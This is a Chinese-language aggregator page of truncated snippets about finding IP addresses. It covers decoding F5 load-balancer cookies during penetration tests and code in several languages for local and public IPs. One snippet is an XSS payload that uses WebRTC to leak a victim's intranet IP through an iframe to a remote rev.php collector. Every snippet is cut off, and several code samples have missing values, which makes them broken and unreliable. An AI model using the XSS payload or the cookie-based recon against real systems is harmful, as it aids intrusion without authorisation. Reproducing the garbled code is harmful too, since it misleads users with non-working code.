渗透测试过程中,经常会遇到目标服务器使用F5 LTM做负载均衡. 如果能获取到目标服务器的真实IP地址,会给后续渗透带来一定便利. 本文既是最近渗透遇到的一点点经验分享. F5修改cookie机制 F5 LTM做负载均衡时,有多种机制实现会话保持.其中用到很多的一种是通过修改cookie来实现的. 具体说来,F5在获取到客户端第一次请求时,会使用set cookie头,给客户端埋入一个特定的cookie. 比如:Set-Cookie: BIGipServerpool_8.29_8030=4870…

 功能:获取用户真实IP地址,代理服务器内网IP,防HTTP_CDN_FORWARDED_FOR注入 function getIP() { if (isset($_SERVER["HTTP_CDN_SRC_IP"])) { $realip = $_SERVER["HTTP_CDN_SRC_IP"]; } else if (isset($_SERVER['HTTP_X_FORWARDED_FOR']) && preg_match('/^([0-9]{1…

/** * 获取访问者内网IP * @return the server ip */ public static String getIntranetIp() { // 本地IP,如果没有配置外网IP则返回它 String localip = null; // 外网IP String netip = null; try { Enumeration netInterfaces = NetworkInterface.getNetworkInterfaces(); InetAddress ip = n…

/*头文件*/ #include "winsock2.h" #pragma comment(lib,"ws2_32.lib") /*Hui 获取当前服务器IP*/ WSADATA wsaData; ]; char *ip; PHOSTENT hostinfo; ,), &wsaData ) == ) { ) { if((hostinfo = gethostbyname(name)) != NULL) { ip = inet_ntoa (*(struct in…

Python 获取本机内网IP 本文记录使用Python获取本机IP的两种方法. 通过hostname来获取本机IP import socket print(socket.gethostbyname(socket.gethostname())) 此方法是先获取hostname,然后在通过hostname来查看本机的IP.不推荐此方法,因为若是在/etc/hosts中将hostnam设置为127.0.0.1,那么获取到的就是127.0.0.1,而非本机的真实IP. 通过UDP获取本机IP impo…

获取本机外网ip //获取本机的公网IP public static string GetIP() { string tempip = ""; try { WebRequest request = WebRequest.Create("http://ip.qq.com/"); request.Timeout = ; WebResponse response = request.GetResponse(); Stream resStream = response.Ge…

一.初衷: 一般在CMDB里会存储一台服务器的内网IP.管理IP.电信IP.联通IP,我们在使用的时候只需要拿到其中一个外网IP地址即可.那么我们就需要判断内网IP.管理IP并剔除掉,获取第一个外网IP. 例如三线机房服务器:10.20.0.111(内网IP),221.222.222.33, 8.8.8.8, 1114.114.144.114, 10.20.1.100(管理IP) 二.原理代码: 内网IP可分为三类: A类地址:10.0.0.0--10.255.255.255 B类地址:172.…

在JSP里,获取客户端的IP地址的方法是:request.getRemoteAddr() ,这种方法在大部分情况下都是有效的.但是在通过了Apache,Squid等反向代理软件就不能获取到客户端的真实IP地址了.如果使用了反向代理软件,将http://192.168.1.110:2046/ 的URL反向代理为http://www.xxx.com/ 的URL时,用request.getRemoteAddr() 方法获取的IP地址是:127.0.0.1 或 192.168.1.110 ,而并不是客户…

前提得浏览器支持webRTC,测试的时候google浏览器测试成功,火狐浏览器不支持webRTC, 再在xss平台直接复制如下js代码: function form_ip(ip,port){ var iframe = document.createElement("iframe"); //通过iframe将可访问的内网ip传给服务器. iframe.setAttribute("src","http://192.168.155.2/rev.php?ip=&q…

基础知识 电脑在局域网内,通过网关/路由器连接到Internet则ip分为内网ip.外网ip.通过ipconfig得到的为局域网ip. 电脑直接拨号连接等,则本机通过ipconfig得到的就是外网ip. 代码 //Get IP int GetLocalIP(std::string &local_ip); int GetInternetIP(std::string &Inernet_ip); int GetLocalIP( std::string &local_ip ) { WSAD…